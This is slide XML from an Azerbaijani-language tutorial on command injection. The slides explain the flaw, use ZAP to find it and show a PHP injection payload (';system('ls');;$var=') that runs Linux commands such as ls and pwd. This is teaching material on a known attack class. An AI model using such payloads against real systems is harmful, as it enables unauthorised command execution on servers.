              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();;$var=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kodunu yazırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server haqqında bütün məlumatları verir. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ən başda göründüyü kimi sistem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> əsaslı sistemdir burda həmən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>üsulnan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kodlarınıda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> istifadə edə bilərik .</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bunun üçün</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);;$var=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yerinə istədiyimiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> əmrini yazırıq.</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17" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21711" t="9415" r="-1" b="10306"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9542614" cy="3069077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097218" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="770" t="6654" b="61884"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3035030"/>
            <a:ext cx="12173042" cy="1874910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097219" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="9078" b="54547"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18958" y="4909940"/>
            <a:ext cx="12154084" cy="1707204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048754" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9542614" y="526476"/>
            <a:ext cx="2422187" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);;$var=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048755" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9542614" y="1143160"/>
            <a:ext cx="3015574" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);;$var=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ"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48756" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330935" y="78016"/>
            <a:ext cx="7508356" cy="2399027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İnjection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        Təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048757" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186446" y="2477043"/>
            <a:ext cx="11819108" cy="3444240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kod icrası zəifliyi olaraq da bilinən bir boşluq növüdür. Bu zəifliyin istifadəçinin sistemdə hər hansı bir məlumat giriş yerində tapılma ehtimalı olduqca yüksəkdir. Komanda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enjeksiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> zəifliyi, istifadəçinin daxil etdiyi məlumatların yanında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və ya Windows əmrlərini də işə salmağa imkan verir. Bu tip zəiflik olduqca təhlükəlidir və istifadəsi çox çətin deyil. Zəifliyin mövcud olduğu sistemdə sistemə uzaqdan giriş təmin etmək, faylları əlavə etmək, silmək və dəyişdirmək kimi bir çox icazə verilən əmrlərdən istifadə edilə bilər.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048880" name="Metin kutusu 1048879"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9048728" y="520610"/>
            <a:ext cx="2206053" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="28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20" name="Şəkil 4" descr="Şəkil ehtiva edir stol  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="16711"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1"/>
            <a:ext cx="8238125" cy="3881335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097221" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="819"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3881336"/>
            <a:ext cx="8242570" cy="2976663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048758" name="Düzbucaqlı 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857875" y="2895600"/>
            <a:ext cx="1619250" cy="98573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59" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8238124" y="225560"/>
            <a:ext cx="4029075" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Commands injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsinə giririk. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açılan shifəni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zaproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və ya başqa programla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> edirik.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22" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1080" t="-1" b="2173"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9497818" cy="3064312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097223" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1240" t="3232"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342" y="3064313"/>
            <a:ext cx="12187658" cy="3722986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048760" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9497818" y="73308"/>
            <a:ext cx="2694182" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zaproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> programının tapdığı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> linkin son bölməsinə yapışdırırıq.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shifədə heç bir dəyeşiklik olmur.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15"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16" name="Rectangle 22"/>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7" name="Freeform: Shape 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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97157" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="174935" y="77989"/>
            <a:ext cx="7626650" cy="4995456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048618"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19" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174935" y="5145009"/>
            <a:ext cx="10307671" cy="1569660"/>
